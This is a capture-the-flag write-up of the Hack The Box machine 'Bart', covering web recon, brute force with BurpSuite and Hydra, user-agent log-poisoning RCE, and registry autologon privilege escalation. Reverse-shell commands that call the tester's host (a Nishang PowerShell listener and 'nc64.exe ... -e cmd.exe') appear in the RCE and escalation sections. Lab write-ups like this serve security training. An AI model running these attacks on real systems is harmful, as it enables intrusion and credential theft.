Hack The Box / Bart

8 minute read

Before starting with couple ways to complete this box, there is an update in the OSCP list due to this is the second box in the list before taking my third attempt to the OSCP exam! As I said before, I chose this list from NetSec Focus in order to improve my penetration testing skills. From this list Bart is the second box, so let’s get to it.

oscp list

Information Gathering

Nmap Scan

As always, starting with a nmap scan to check what ports are open and what services are running in this machine.

nmap -sC -sV -p- -oN scan.nmap 10.10.10.81

nmap-scan

Looks like we have a HTTP service running in port 80 and according nmap it redirects to http://forum.bart.htb which means that we might want to add this in the /etc/hosts list. To do this just type in the terminal:

nano /etc/hosts

etc-hosts

Once forum.bart.htb and bart.htb are added, browsing the website we finally find some results.

bart-browser

Directory Brute Force

Then having HTTP service running in port 80 and have added the hosts in the /etc/hosts list, it’s time to use dirsearch in order to get some results from http://forum.bart.htb, but unfortunately, the results are not helpful.

python3 dirsearch.py -u http://forum.bart.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50

dir-no-find

Then, thinking around to get something else, a scan in http://bart.htb didn’t sound like a bad idea, so this time we got some results.

python3 dirsearch.py -u http://bart.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50

dir-bart-good

So, navigating to http://bart.htb/monitor/ we have some log in form with the “Forgot password?” option, that means that we can try some name of the employees that appear in the website.

monitor-login

These are the employees that the website shows.

team

So, after finding out the log in form and the name of a couple employees it doesn’t sound a bad idea to do some brute force to get the password, but the names that we normally find in the website don’t work besides Daniel, but unfortunately his name won’t get us far.

forgot-pass

So, what comes later to check more usernames to make some brute force, we go to the page source, and effectively we found some commented code from Harvey who is the developer.

lazy-harvey

And Harvey is the username that is going to get us far with this machine.

harvey login

Password Brute Force

Before doing brute force at http://bart.htb/monitor, we’ll need two essential things.

  1. A sharp wordlist with sharp data in order to brute force the password.
  2. A sharp tool in order to make the bruteforcing where in this case I used BurpSuite and Hydra.

1. Making a sharp wordlist

After following a couple guides of how to get this box, I was not very convinced with the way of how to get the wordlist from the website because the password didn’t show up after following the steps. So the usage of cewl was crucial, but also the page source code was the key in order to find the password.

My solution

I downloaded the whole index page of the website in order to take off the commented code and make it show up in my own web server using python. Using this, at the time to use cewl, the password would show up after making some modifications.

First I downloaded the index page with curl.

curl http://forum.bart.htb/ > bart.html

After have downloaded the code, I set up a web server with python in the location where I had the index of the website in order to see the data.

python -m SimpleHTTPServer 80

And then, the file was there.

local-bart

Once we see the file in the server, it’s the time to modify it deleting some of the commented code in order to make seeable some of the information from Harvery Potter. So, we delete as the picture below shows.

local-bart-delete

After deleting the comentede code, it should look something like this.

local-bart-delete-after

Then, now if we open the file from our localhost in the browser it should appear this information down below where it says “our team”.

show-harvey

Now, it’s time to make our wordlist using the tool cewl.

cewl --email http://localhost/bart.html> list.txt

Where:

  • --email Allows to extract some of the visible emails in the index page given.

Then after executing the command above, at the end of the list should appear the following emails.

before-sharp

At the time to do some brute force, it sound like a bad idea to do it with email lists, so I modified the list to look sharper just with the last names of the employees.

after-sharp

Now, we have a sharp wordlist for our brute force attack!

2. Sharp tools to do brute force (BurpSuite & Hydra)

To do the brute forcing once having a sharp wordlist, I was trying to learn how to do bruteforcing with Burpsuite and Hydra where both gave great results. Here I’ll explain the usage of these two.

Burpsuite

To use BurpSuite we are going to need to configure a proxy to pass the traffic through BurpSuite, to do this I used Foxy Proxy because is quite easy to set the proxy up.

foxy-proxy

Once the proxy is configured with our browser, it’s time to make the HTTP request adding a value to the password while intercepting the HTTP request, so we can see how it looks once the request is in BurpSuite. Once the request is in BurpSuite, we are going to use “intruder” in order to do the brute force attack.

before-intruder

We clear the values that we are not going to brute force as is shown in the picture down below.

clear-intruder

After clearing the values that we are not going to use, it’s time to stablish the list that we got from the index page (The list showed above).

after-intruder

Now that everything has been set, it’s time to “Start Attack” as the picture shows above and wait until the password is being cracked.

password-cracked

So, after starting the attack and waiting a couple minutes, looking at the lenght of the requests looks like "potter" is the password, so password cracked! which means user: havery, password: potter. After the password was cracked, our browser doesnt recognized http://monitor.bart.htb.

monitor-not-found

Which means that we have to add this to our /etc/hosts list.

etc-monitor

and wolah! we’re officially in.

in-monitor

After looking around in "Servers" looks like we have something else to look at http://internal-01.bart.htb.

before-internal

Which means that we should add http://internal-01.bart.htb in our /etc/hosts as well.

etc-internal

and wolah! we can see internal now.

after-internal

Then we need to crack another password, but this time we’ll use Hydra! And our username harvey still working because he is the developer.

Hydra

So having to crack the password, this time it says that it accepts password with a minimum of 8 characters which means that we have to modify the wordlist in order to have words with 8 characters for the brute force attack.

harvey-chars

So there is a tool called sed which will help us to get our wordlist modified with only words with 8 characters. The wordlist used for this brute force attack is "rockyou.txt" which es the old but gold wordlist password and it’s located at /usr/share/wordlists/rockyou.txt.gz. This the command used in sed:

sed -nr '/^.{8,150}$/p' /usr/share/wordlists/rockyou.txt > rockyou-modified.txt

After having our wordlist we’ll use BurpSuite to check the parameter from the HTTP request in order to set those parameters in hydra. These are the parameters needed that we got from BurpSuite.

hydra-parameters

We’re ready to use hydra, so we use the following command:

hydra -l harvey -P rockyou8.txt -t 60 internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:F=Invalid Username or Password"

Where:

  • -l specifies the username.
  • -P specifies the wordlist.
  • -t specifies the number of threads.
  • http-form-post specifies the service and the parameter gotten from BurpSuite.

password-cracked2

The password has been cracked! so username: harvey and password: Password1, and we have access to our next page.

php-chat

Reverse Shell through RCE (Remote Code Execution)

Clicking around there are not many thing to see, but when we intercep the request and click in "Log" we get some code execution in the back end in log.php. This is what we got from BurpSuite. More information about log.php in the php-ajax-simple-chat github page.

harvey-log

So after looking more information about this and playing around with values in the browser, we got some rare answer which displays the user-agent in the browser.

play-browser

That means that we might execute some php code in the header. To do this I tried two different ways learned from different people who have already done this box.

Reverse Shell Using Python

So, this one got me excited because it was the first time trying something like this. I really appreciate 0xdf for teaching and publishing the write up. To get the reverse shell we’ll use python and its library requests.

python-cool

As we’re using our localhost as a proxy, I strongly recommend to have BurpSuite open and listening the requests. In the next picture we’re setting the header in order to provide code execution from the command prompt from Bart, and doing the request in order to make it happen.

before-cmd

So once those variables has been executed in python, we use curl in order to prove that we got the command prompt from Bart.

curl http://internal-01.bart.htb/log/0xdf.php?cmd=whoami

after-cmd

Now having access to the command prompt from Bart, it’s time to get a reverse shell with powershell, but before that we must set up our web server in order to download our powershell script from Nishang. Remember to add Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.36 -Port 4444 in the last line of the script in order to get the reverse shell to our localhost. So let’s set the web server up:

python -m SimpleHTTPServer 80

and let’s make the request in order to download and execute the powershell script from Nishang.

python-getting-shell

Setting up our netcat listener and we got a shell!

shell-gotten

Revese Shell Using BurpSuite

So, to get the code execution in burpsuite we have to intercept the request and modify the user-agent as I explained before. In this case we make a request and modify the user agent to execute php code.

burp-poison

After we did the request, we can execute code as it would be the command prompt from the system.

authority-answer

Then now it’s time to execute the command that will get us our powershell script from Nishang and get us the reverse shell.

shell-gotten2

and wolah, we got our shell!

shell-gotten

Privilege Escalation.

Once being in the system, there is a need to check some privileges where in this case I followed the guide from absolomb which I have to say that it was very useful. If you read in the guide by “Anything in the Registry for User Autologon?” that is going to be the piece to resolve the puzzle. To do this we might want to have an stable shell gotten directly from a command prompt and not from powershell, then to do this we want to transfer "nc64.exe" in the machine due to its 64 bit architecture.

system-info

To transfer this we can use the smbserver from Impacket.

nc64

Once it’s transfer it’s time to get our stable reverse shell in order to perform sharp commands without error. To do this we might want to use any technique showed above where we can use Burpsuite or Python. At the time to make, this is the following command to get the reverse shell with nc64.exe

nc64.exe 10.10.14.36 1234 -e cmd.exe

and wolah we have the shell.

nc-shell

So, after following the privilege escalation guide, this is the command that gave us the Administrator password due to the Registry for User Autologon.

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

and this is the result.

priv-esc

So we can use this credentials in multiple ways, but the one that I chose it was through the command net use. These are the following commands to execute.

net use x: \\localhost\c$ /user:administrator 3130438f31186fbaf962f407711faddb
x:

After executing we have authority system! and we can get the root and user flags!

flags

To conclude

To be honest this box was rough because I took some time to do it by myself and try to solve a couple rabbit holes such as the wordlist and the password cracking, but I have to say that I gain some knowledge related to brute force attacks. Also the escalation privileges was straight forward having a guide in the hand.

Leave a comment